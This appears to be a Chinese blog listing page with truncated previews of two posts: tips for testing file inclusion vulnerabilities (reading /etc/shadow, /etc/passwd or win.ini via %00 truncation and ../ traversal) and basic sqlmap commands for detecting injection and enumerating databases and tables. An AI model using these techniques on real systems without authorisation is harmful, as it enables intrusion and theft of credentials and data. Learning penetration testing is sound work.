- 博客(2)
- 收藏
- 关注
RSS订阅原创 文件包含漏洞尝试思路
1、观察提示,是否为系统文件,如win.ini在windows系统的c:/windows/win.ini中,boot.ini在windows系统的c:/boot.ini中linux里有:/etc/shadow /etc/passwd2、带入文件,如果有后缀被自动加上,如果报错,尝试加入%00进行截断,如果报错,尝试加入绝对路径,比如c:/windows/win.ini%00,如果报错,尝试使用…达到256个字符进行截断,尝试加入…/,可以多加几个,因为在有的包含中代码中会加上一个路径前缀,所以我们必须通
2020-10-09 08:37:55
708
原创 sqlmap基础注入
sqlmap基础注入判断有无注入python sqlmap.py -u “http://192.168.1.1/list.php?id=1” --batch注入数据库python sqlmap.py -u “http://192.168.1.1/list.php?id=1” --dbs --batch注入表python sqlmap.py -u “http://192.168.1.1/list.php?id=1” -D KM --tables --batch注入字段python sqlmap
2020-10-09 08:35:44
636
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人